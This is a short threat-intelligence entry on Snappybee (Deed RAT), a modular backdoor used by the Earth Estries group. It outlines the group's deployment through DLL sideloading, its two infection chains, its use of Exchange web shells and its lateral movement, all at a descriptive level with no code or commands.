Snappybee

Snappybee, also known as Deed RAT, is a modular backdoor malware that has been identified as part of the toolkit used by Earth Estries to exploit target machines. It is one of four major tools, including Cobalt Strike and Zingdoor, used by the group to gain control over systems. Snappybee is often deployed through DLL sideloading, similar to Zingdoor, and is considered the successor to ShadowPad, another notorious malware. The malware has been used in sophisticated cyber-attacks against various targets, including government servers in Southeast Asia. The deployment of Snappybee typically occurs in the later stages of the attack routine, often following the installations of other backdoors like Zingdoor and Cobalt Strike, although the order of deployment may vary. This malware is part of two distinct infection chains employed by Earth Estries. In the first chain, tools like PsExec, Trillclient, Hemigate, and Crowdoor are delivered via CAB files. In contrast, the second chain involves the use of malware such as Zingdoor and Snappybee, which are delivered through cURL downloads alongside utility tools like PortScan and NinjaCopy. Earth Estries exploits vulnerable Exchange servers using web shells like ChinaChopper and additional backdoors such as Zingdoor, Snappybee, and Cobalt Strike, showcasing the diversity of their toolkit. Once inside a network, lateral movement is performed by the initial backdoor, with additional backdoors like Zingdoor and Snappybee being installed on other machines within the network. This approach allows for a broad and sustained compromise of the targeted system, enabling data theft, disruption of operations, or ransomware attacks.